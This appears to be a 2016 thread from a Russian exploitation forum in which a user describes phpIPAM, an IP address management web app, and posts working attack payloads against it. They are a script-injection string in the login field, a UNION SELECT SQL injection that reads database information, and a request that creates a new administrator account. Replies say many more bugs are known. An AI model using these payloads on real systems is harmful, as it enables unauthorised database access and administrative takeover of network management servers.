1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

PHPIPAM баг

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем DarkKnight, 19 сен 2016.

  1. TopicStarter Overlay
    DarkKnight

    DarkKnight

    Регистрация:
    1 июн 2016
    Сообщения:
    126
    Симпатии:
    144
    Для начало узнаем что такое PHPipam
    Веб-приложение для управления IP адресами (IPAM). Его цель состоит в том чтобы упростить управление IP-адресами. Это приложение с базой данных MySQL, библиотеками JQuery, Ajax и некоторыми возможностями HTML5 / CSS3.
    Возможности PHPipam:
    • Управление IPv4 / IPv6 адресами.
    • Обновление состояния ICMP, сканирование подсети и отображение состояния.
    • Аутентификация домена (AD) / OpenLDAP.
    • Права для отдельных групп.
    • Многоуровневые вложенные подсети.
    • Визуальное отображение подсети.
    • Калькулятор адресов IPv4 / IPv6.
    • Поддержка VRF.
    • Управление VLAN.
    • Управление устройствами.
    • Импорт RIPE.
    • Импорт / экспорт файлов XLS.
    • Управление пользователями.
    • Уведомление по электронной почте с подробностями IP.
    • Поиск по базе IP.
    • Модуль запроса IP.
    • Добавление, редактирование и удаление диапазона IP.
    • Поля пользовательских IP, подсети, адреса UserVLAN.

    Демо версия Please login or register to view links

    А теперь про найденные баги
    На странице авториз. можно через javascript команды получить любую информацию
    Можно получить данные из БД и про БД
    Можно создать пользователя и дать ему привилегии администратора


    Для примера

    *ipamusername=<script>alert("DarkKnight")</script>&ipampassword=123
    1.jpg
    2.jpg



    *UNION SELECT 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15#

    03.jpg
    [​IMG]

    Добавим юзера с правами админа
    *real_name=log2&username=log2&email=log2%40dee.fr&role=Administrator&userId=&action=add&domainUser=0&password1=password

    [​IMG]
    [​IMG]
     
    • Like Like x 1
    Последнее редактирование модератором: 19 сен 2016
    Метки:
  2. ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.680
    Симпатии:
    2.273
    там уже найденые еще 30+ багов
    такое впечатление что это квест на пентестинг :D
     
    • Like Like x 2
    • Agree Agree x 1
  3. graseful

    graseful

    Регистрация:
    3 дек 2012
    Сообщения:
    160
    Симпатии:
    44
    open source как никак ....
     

Поделиться этой страницей

Загрузка...